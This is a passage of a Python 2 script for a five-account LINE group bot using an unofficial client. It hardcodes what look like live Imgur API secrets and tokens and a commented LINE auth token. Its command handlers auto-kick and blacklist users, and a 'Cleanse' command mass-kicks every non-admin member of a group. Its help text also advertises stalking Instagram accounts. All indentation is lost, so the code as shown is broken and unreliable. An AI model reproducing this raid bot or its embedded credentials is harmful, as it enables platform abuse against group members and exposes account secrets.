kg.loginResult()
adm = cl
# adm = LineAlpha.LINE()
# adm.login(token="EkoRa4LbxQLepMyWmEMe.idD7rqcO/flZ+HSQWA/z7G.Z0Nd273uZOb1aD1eeTNA0FVr1/dN5ja7KuqCAyZlQFg=")
# adm.loginResult()
client_id = '511abc94ee71658'
client_secret = '948a2fcdbf566c04bcce5f990e349ce795ee7460'
access_token = '30181acf5583ad6a215b4f69e6e5c7bc5c66efdb'
refresh_token = '4a6b3f983b96714c2e9b581edf86f86e0d681938'
client = ImgurClient(client_id, client_secret, access_token, refresh_token)
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
album = None
image_path = 'tmp/tmp.jpg'
# kk=ki=kc=cl
helpMessage ="""[Ardh-] Bot(s)
Use Prefix 「Ar」 to use the Bot(s)
Prefix is Case sensitive but the commands is not.
[Gid] - Show Group ID
[Mid all] - Show all the Bot(s) MID
[Mid 1/2/3/4/5] - Shows the specific Bot MID
[Bot all] - Show all the Bot(s) Contact
[Bot 1/2/3/4/5] - Shows the specific Bot Contact
[Yid] - Show your ID
[Contact 「mid」] - Give Contact by MID
[Join on/off] - Auto join group
[Leave on/off] - Allows the bot to leave the group
[*] Command in the groups [*]
[Ginfo] - Group Info
[Banlist] - Check Banlist
[Cancel] - Cancel all pending(s) invitation
[Stalk 「ID」] - Upload lastest instagram picture from ID
[*] Admin and Staff Commands [*]
[Absen] - Check if bot is Online
[Glink on/off] - Turn invitation link for group on/off
[Cancel on/off] - Turn auto cancel invite on/off
[Gn 「group name」] - Change Group Name
[Sp/Speed] - Check bot response speed
[Random:「A」] - Randomize group name A times
[Bc 「text」] - Let the bot send a text
[*] Admin only Commands [*]
[Cleanse] - Clear all members in the group
[Bye all] - Bot Leave
[Ban 「@」] - Ban By Tag
[Unban 「@」] - Unban By Tag
[Ban] - By Sharing Contact
[Unban] - By Sharing Contact
[Kill ban] - Kick all banned contact(s)
[Staff add/remove @] - Add or Remove Staff By Tag
"""
KAC=[cl,ki,kk,kc,kg]
mid = cl.getProfile().mid
Amid = kk.getProfile().mid
Bmid = ki.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = kg.getProfile().mid
Bots = [mid,Amid,Bmid,Cmid,Dmid]
admin = ["u20377b4500a8f852f3fe1b2ac1af99ee"]
staff = ["u20377b4500a8f852f3fe1b2ac1af99ee"]
adminMID = "u20377b4500a8f852f3fe1b2ac1af99ee"
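# Shared runtime state: feature toggles, canned replies, display names and the
# kick blacklist used by the event handlers below.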
wait = {
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":True,
"cName":"[Ardh-]BOT1",
"cName2":"[Ardh-]BOT2",
"cName3":"[Ardh-]BOT3",
"cName4":"[Ardh-]BOT4",
"cName5":"[Ardh-]BOT5",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protectionOn":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
cancelinvite = {
'autoCancel':True,
'autoCancelUrl':True
}
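# Pre-computed cyclic rotations of each bot's display name (11 shifts per bot).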
bot1_name = {
"1" : "[Ardh-]BOT1",
"2" : "Ardh-]BOT1[",
"3" : "rdh-]BOT1[A",
"4" : "dh-]BOT1[Ar",
"5" : "h-]BOT1[Ard",
"6" : "-]BOT1[Ardh",
"7" : "]BOT1[Ardh-",
"8" : "BOT1[Ardh-]",
"9" : "OT1[Ardh-]B",
"10" : "T1[Ardh-]BO",
"11" : "1[Ardh-]BOT"
}
bot2_name = {
"1" : "[Ardh-]BOT2",
"2" : "Ardh-]BOT2[",
"3" : "rdh-]BOT2[A",
"4" : "dh-]BOT2[Ar",
"5" : "h-]BOT2[Ard",
"6" : "-]BOT2[Ardh",
"7" : "]BOT2[Ardh-",
"8" : "BOT2[Ardh-]",
"9" : "OT2[Ardh-]B",
"10" : "T2[Ardh-]BO",
"11" : "2[Ardh-]BOT"
}
bot3_name = {
"1" : "[Ardh-]BOT3",
"2" : "Ardh-]BOT3[",
"3" : "rdh-]BOT3[A",
"4" : "dh-]BOT3[Ar",
"5" : "h-]BOT3[Ard",
"6" : "-]BOT3[Ardh",
"7" : "]BOT3[Ardh-",
"8" : "BOT3[Ardh-]",
"9" : "OT3[Ardh-]B",
"10" : "T3[Ardh-]BO",
"11" : "3[Ardh-]BOT"
}
bot4_name = {
"1" : "[Ardh-]BOT4",
"2" : "Ardh-]BOT4[",
"3" : "rdh-]BOT4[A",
"4" : "dh-]BOT4[Ar",
"5" : "h-]BOT4[Ard",
"6" : "-]BOT4[Ardh",
"7" : "]BOT4[Ardh-",
"8" : "BOT4[Ardh-]",
"9" : "OT4[Ardh-]B",
"10" : "T4[Ardh-]BO",
"11" : "4[Ardh-]BOT"
}
bot5_name = {
"1" : "[Ardh-]BOT5",
"2" : "Ardh-]BOT5[",
"3" : "rdh-]BOT5[A",
"4" : "dh-]BOT5[Ar",
"5" : "h-]BOT5[Ard",
"6" : "-]BOT5[Ardh",
"7" : "]BOT5[Ardh-",
"8" : "BOT5[Ardh-]",
"9" : "OT5[Ardh-]B",
"10" : "T5[Ardh-]BO",
"11" : "5[Ardh-]BOT"
}
setTime = {}
setTime = wait2['setTime']
def upload_tempimage(client):
'''
Upload the temporary image at image_path to Imgur and return the upload result.
'''
# Here's the metadata for the upload. All of these are optional, including
# this config dict itself.
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
messageReq = {}
def sendMessage(to, text, contentMetadata={}, contentType=0):
# Build a Message from the primary bot account, bump the per-target sequence
# counter and send it through cl.
mes = Message()
mes.to, mes.from_ = to, mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
cl.sendMessage(mes)
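# Record the display name of every member that reads a message after a read point
# has been set for the chat.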
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
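# Main event dispatcher: each op.type branch below handles one kind of LINE event
# (group updates, invitations, joins and kicks, room invites, incoming messages).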
def bot(op):
try:
if op.type == 0:
return
if op.type == 11:
if cancelinvite["autoCancelUrl"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
print "Url Opened, Autokick on"
else:
print "random group update"
else:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
kk.acceptGroupInvitation(op.param1)
print "BOT 2 Joined"
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
ki.acceptGroupInvitation(op.param1)
print "BOT 3 Joined"
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
kc.acceptGroupInvitation(op.param1)
print "BOT 4 Joined"
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
kg.acceptGroupInvitation(op.param1)
else:
if cancelinvite["autoCancel"] == True:
try:
X = cl.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(op.param1, gInviMids)
print str(gInviMids) + " invite canceled"
except:
try:
print "Retry canceling invitation"
X = random.choice(KAC).getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gInviMids)
print str(gInviMids) + " invite canceled"
except:
print "Bot can't cancel the invitation"
pass
if op.type == 15:
random.choice(KAC).sendText(op.param1, "Good Bye :)")
print op.param3 + "has left the group"
if op.type == 17:
if op.param3 in wait["blacklist"]:
try:
cl.kickoutFromGroup(op.param1, op.param3)
except:
random.choice(KAC).kickoutFromGroup(op.param1, op.param3)
if op.type == 19:
print "someone was kicked"
if op.param3 in admin:
print "Admin has been kicked"
if op.param2 in Bots:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,op.param3)
adm.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
adm.acceptGroupInvitation(op.param1)
print "Admin Joined"
if mid in op.param3:
print "BOT1 has been kicked"
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kk.inviteIntoGroup(op.param1,op.param3)
cl.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
cl.acceptGroupInvitation(op.param1)
print "BOT1 Joined"
if Amid in op.param3:
print "BOT2 has been kicked"
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
ki.inviteIntoGroup(op.param1,op.param3)
kk.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kk.acceptGroupInvitation(op.param1)
print "BOT2 Joined"
if Bmid in op.param3:
print "BOT3 has been kicked"
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kc.inviteIntoGroup(op.param1,op.param3)
ki.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
ki.acceptGroupInvitation(op.param1)
print "BOT3 Joined"
if Cmid in op.param3:
print "BOT4 has been kicked"
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kg.inviteIntoGroup(op.param1,op.param3)
kc.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kc.acceptGroupInvitation(op.param1)
print "BOT4 Joined"
if Dmid in op.param3:
print "BOT5 has been kicked"
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,op.param3)
kg.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kg.acceptGroupInvitation(op.param1)
print "BOT5 Joined"
else:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
kg.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "autokick executed"
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
print "BOT(s) Leaving chat Room"
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
print "BOT(s) Leaving chat Room"
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in the Blacklist")
wait["wblacklist"] = False
print "MID Already in the Blacklist"
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to the Blacklist")
print [msg.contentMetadata["mid"]] + " Added to the Blacklist"
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted from the Blacklist")
wait["dblacklist"] = False
print [msg.contentMetadata["mid"]] + " Removed from the Blacklist"
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Contact not in Blacklist")
print "MID not in blacklist"
elif wait["contact"] == True:
if msg.from_ in admin:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[Display Name]:\n" + msg.contentMetadata["displayName"] + "\n\n[MID]:\n" + msg.contentMetadata["mid"] + "\n\n[Status Message]:\n" + contact.statusMessage + "\n\n[Profile Picture]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n[Cover Picture]:\n" + str(cu))
print "Contact sent"
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n\n[MID]:\n" + msg.contentMetadata["mid"] + "\n\n[Status Message]:\n" + contact.statusMessage + "\n\n[Profile Picture]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n[Cover Picture]:\n" + str(cu))
print "Contact sent"
#-----------------------[Help Section]------------------------
elif msg.text in ["Ar /help","Ar /Help"]:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,helpMessage)
print "[Command]/help executed"
else:
cl.sendText(msg.to,helpMessage)
#-----------------------[Group Name Section]------------------------
elif "Ar Gn " in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Ar Gn ","")
random.choice(KAC).updateGroup(X)
print "[Command]Gn executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
cl.sendText(msg.to,"It can't be used besides the group.")
print "Gn executed outside group chat"
elif "Ar gn " in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Ar gn ","")
random.choice(KAC).updateGroup(X)
print "[Command]Gn executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
cl.sendText(msg.to,"It can't be used besides the group.")
print "Gn executed outside group chat"
#-----------------------[Kick Section]------------------------
elif "Ar Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Ar Kick ","")
cl.sendText(msg.to,"Good bye.")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
print "[Command]Kick executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "Ar kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Ar kick ","")
cl.sendText(msg.to,"Good bye.")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
print "[Command]Kick executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Kill ban","Ar kill ban"]:
if msg.toType == 2:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += filter(lambda member: member == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"It looks empty here.")
return
cl.sendText(msg.to,"Blacklisted contact noticed...")
cl.sendText(msg.to,"Begin Kicking contact")
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
print "[Command]Kill ban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Send Profile Section]------------------------
elif msg.text in ["Ar Bot all","Ar bot all"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': Amid}
kk.sendMessage(msg)
msg.contentMetadata = {'mid': Bmid}
ki.sendMessage(msg)
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentMetadata = {'mid': Dmid}
kg.sendMessage(msg)
print "[Command]Bot all executed"
elif msg.text in ["Ar Bot 1","Ar bot 1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
print "[Command]Bot 1 executed"
elif msg.text in ["Ar Bot 2","Ar bot 2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
kk.sendMessage(msg)
print "[Command]Bot 2 executed"
elif msg.text in ["Ar Bot 3","Ar bot 3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki.sendMessage(msg)
print "[Command]Bot 3 executed"
elif msg.text in ["Ar Bot 4","Ar bot 4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
print "[Command]Bot 4 executed"
elif msg.text in ["Ar Bot 5","Ar bot 5"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
kg.sendMessage(msg)
print "[Command]Bot 5 executed"
#-----------------------[Cancel invitation Section]------------------------
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
cl.sendText(msg.to,"Canceling all pending(s) invitation")
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
print "[Command]Cancel executed"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"This group doesn't have any pending invitation")
print "[Command]Group don't have pending invitation"
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "Cancel executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Group link Section]------------------------
elif msg.text in ["Ar Glink off","Ar Link off","Ar glink off","Ar link off"]:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation link turned off")
print "[Command]Glink off executed"
else:
cl.sendText(msg.to,"Already turned off")
print "[Command]Glink off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Glink off executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Ar Glink on","Ar Link on","Ar glink on","Ar link on"]:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation link turned on")
print "[Command]Glink on executed"
else:
cl.sendText(msg.to,"Already turned on")
print "[Command]Glink on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Glink on executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Group info Section]------------------------
elif msg.text in ["Ar Ginfo","Ar ginfo"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
print "[Command]Ginfo executed"
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
print "[Command]Ginfo executed"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Ginfo executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Bot/User/Group ID Section]------------------------
elif msg.text in ["Ar Gid","Ar gid"]:
cl.sendText(msg.to,msg.to)
print "[Command]Gid executed"
elif msg.text in ["Ar Mid all","Ar mid all"]:
cl.sendText(msg.to,"[Ardh-]Bot(s) ID\n[Ardh-]BOT1\n" + mid + "\n\n[Ardh-]BOT2\n" + Amid + "\n\n[Ardh-]BOT3\n" + Bmid + "\n\n[Ardh-]BOT4\n" + Cmid + "\n\n[Ardh-]BOT5\n" + Dmid)
print "[Command]Mid executed"
elif msg.text in ["Ar Mid 1","Ar mid 1"]:
cl.sendText(msg.to,mid)
print "[Command]Mid 1 executed"
elif msg.text in ["Ar Mid 2","Ar mid 2"]:
kk.sendText(msg.to,Amid)
print "[Command]Mid 2 executed"
elif msg.text in ["Ar Mid 3","Ar mid 3"]:
ki.sendText(msg.to,Bmid)
print "[Command]Mid 3 executed"
elif msg.text in ["Ar Mid 4","Ar mid 4"]:
kc.sendText(msg.to,Cmid)
print "[Command]Mid 4 executed"
elif msg.text in ["Ar Mid 5","Ar mid 5"]:
kg.sendText(msg.to,Dmid)
print "[Command]Mid 5 executed"
elif msg.text in ["Ar Yid","Ar yid"]:
cl.sendText(msg.to,msg.from_)
print "[Command]Yid executed"
#-----------------------[Send Contact Section]------------------------
elif "Ar Contact" in msg.text:
mmid = msg.text.replace("Ar Contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
print "[Command]Contact executed"
elif "Ar contact" in msg.text:
mmid = msg.text.replace("Ar contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
print "[Command]Contact executed"
#-----------------------[Auto Join Section]------------------------
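# "Ar Join on/off" only flips wait["autoJoin"]; the flag is presumably acted on by the invitation handler elsewhere in this script.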
elif msg.text in ["Ar Join on","Ar join on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join already on")
print "[Command]Join on executed"
else:
cl.sendText(msg.to,"Auto join already on")
print "[Command]Join on executed"
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join turned on")
print "[Command]Join on executed"
else:
cl.sendText(msg.to,"Auto join turned on")
print "Join on executed"
elif msg.text in ["Ar Join off","Ar join off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join already off")
print "[Command]Join off executed"
else:
cl.sendText(msg.to,"Auto join already off")
print "[Command]Join off executed"
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join turned off")
print "[Command]Join off executed"
else:
cl.sendText(msg.to,"Auto join turned off")
print "[Command]Join off executed"
#-----------------------[Group Url Section]------------------------
elif msg.text in ["Ar Gurl","Ar gurl"]:
if msg.toType == 2:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
print "[Command]Gurl executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
print "[Command]Gurl executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[All bots join group Section]------------------------
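# "Ar Join all" temporarily opens the group ticket, lets every bot account join via the reissued ticket, then closes the ticket again.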
elif msg.text in ["Ar Join all","Ar join all"]:
if msg.from_ in admin:
try:
ginfo = cl.getGroup(msg.to)
ginfo.preventJoinByTicket = False
cl.updateGroup(ginfo)
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
kg.acceptGroupInvitationByTicket(msg.to,Ticket)
ginfo = random.choice(KAC).getGroup(msg.to)
ginfo.preventJoinByTicket = True
random.choice(KAC).updateGroup(ginfo)
except:
print "Somethings wrong with the url"
print "[Command]Join all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Bot(s) Leave Section]------------------------
elif msg.text in ["Ar Bye all","Ar bye all"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
kg.leaveGroup(msg.to)
except:
pass
print "[Command]Bye all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 1","Ar bye bot 1"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 1 executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 2","Ar bye bot 2"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kk.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 2 executed"
else:
kk.sendText(msg.to,"Command denied.")
kk.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 3","Ar bye bot 3"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = ki.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 3 executed"
else:
ki.sendText(msg.to,"Command denied.")
ki.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 4","Ar bye bot 4"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kc.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 4 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 5","Ar bye bot 5"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kg.getGroup(msg.to)
try:
kg.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 5 executed"
else:
kg.sendText(msg.to,"Command denied.")
kg.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Cleanse Section (USE AT YOUR OWN RISK!)]------------------------
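# "Ar Cleanse" kicks the targeted group members (everyone except the admin and the bot accounts), using a randomly chosen bot for each kick.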
elif msg.text in ["Ar Cleanse","Ar cleanse"]:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Cleanse executing"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
kk.sendText(msg.to,"Group cleansing begin")
kc.sendText(msg.to,"Goodbye :)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
# --------------[Bot and Admin MID]----------------
for safe_mid in [adminMID, mid, Amid, Bmid, Cmid, Dmid]:
if safe_mid in targets:
targets.remove(safe_mid)
# --------------[Bot and Admin MID]----------------
if targets == []:
ki.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[ki,kk,kc,cl,kg]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Group cleansed")
print "[Command]Cleanse executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Ban/Unban Section]------------------------
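# Blacklist entries are keyed by mid and persisted to st2__b.json; "Ar Ban/Unban @name" resolves the target by display name, while plain "Ar Ban/Unban" sets a flag so that, presumably, a later contact-card message selects the target.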
elif "Ar Ban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Ban executed"
_name = msg.text.replace("Ar Ban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Blacklist")
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Unban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Unban executed"
